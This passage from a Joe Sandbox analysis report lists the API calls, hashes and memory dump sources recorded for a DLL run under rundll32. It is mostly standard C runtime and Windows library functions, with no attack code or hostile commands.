                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: MOC$csm
                                                                                                          • API String ID: 803148776-1389381023
                                                                                                          • Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
                                                                                                          • Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                                                                                                          • _memset.LIBCMT ref: 1002A78B
                                                                                                          • GetWindowTextA.USER32 ref: 1002A7A5
                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 289641511-0
                                                                                                          • Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
                                                                                                          • Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 10033049
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __amsg_exit.LIBCMT ref: 10033069
                                                                                                          • __lock.LIBCMT ref: 10033079
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                                                                                                          • InterlockedIncrement.KERNEL32(02C91628), ref: 100330C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
                                                                                                          • Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Fputc$H_prolog3_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2569218679-3916222277
                                                                                                          • Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
                                                                                                          • Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA,10027AEC,0000000C), ref: 100286CC
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                          • API String ID: 3274081130-63838506
                                                                                                          • Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
                                                                                                          • Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 10037AF8
                                                                                                            • Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 10037B0F
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 10037B1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2163707966-1018135373
                                                                                                          • Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
                                                                                                          • Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                          • Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
                                                                                                          • Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043F49
                                                                                                            • Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043F66
                                                                                                            • Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043F74
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          Strings
                                                                                                          • invalid string position, xrefs: 10043F4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                                          • String ID: invalid string position
                                                                                                          • API String ID: 843739861-1799206989
                                                                                                          • Opcode ID: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction ID: 29482f66c8a5f8716b1ced5184e44cdebd8c398cac92a99365ce02766c2dbf89
                                                                                                          • Opcode Fuzzy Hash: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction Fuzzy Hash: 6FD0127580004D9ADB05DBD0CC55EDE7378EB14311F541835B301EA041DF747A49C658
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
                                                                                                          • Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                                                                                                          • _fgetc.LIBCMT ref: 100434AD
                                                                                                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                                                                                                          • _memcpy_s.LIBCMT ref: 10043472
                                                                                                          • _ungetc.LIBCMT ref: 100434F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 9762108-0
                                                                                                          • Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
                                                                                                          • Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __flush.LIBCMT ref: 10044F72
                                                                                                          • __fileno.LIBCMT ref: 10044F92
                                                                                                          • __locking.LIBCMT ref: 10044F99
                                                                                                          • __flsbuf.LIBCMT ref: 10044FC4
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                            • Part of subcall function 10032DE1: __decode_pointer.LIBCMT ref: 10032DEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                          • String ID:
                                                                                                          • API String ID: 3240763771-0
                                                                                                          • Opcode ID: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction ID: f2cbb9fbd7bb741866626b2388375d2bcd999be80ff2815986012e88e7b340f8
                                                                                                          • Opcode Fuzzy Hash: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction Fuzzy Hash: 48418F35A00605DFDB15CFAA888099EB7F6EF80360F328639E855D7580EB71EE45CB48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
                                                                                                          • __isleadbyte_l.LIBCMT ref: 1003EF2C
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
                                                                                                          • Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __msize_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288803200-0
                                                                                                          • Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
                                                                                                          • Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$__cftof
                                                                                                          • String ID:
                                                                                                          • API String ID: 887240167-0
                                                                                                          • Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
                                                                                                          • Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                                                                                                          • LockResource.KERNEL32(00000000), ref: 100231C2
                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10023210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
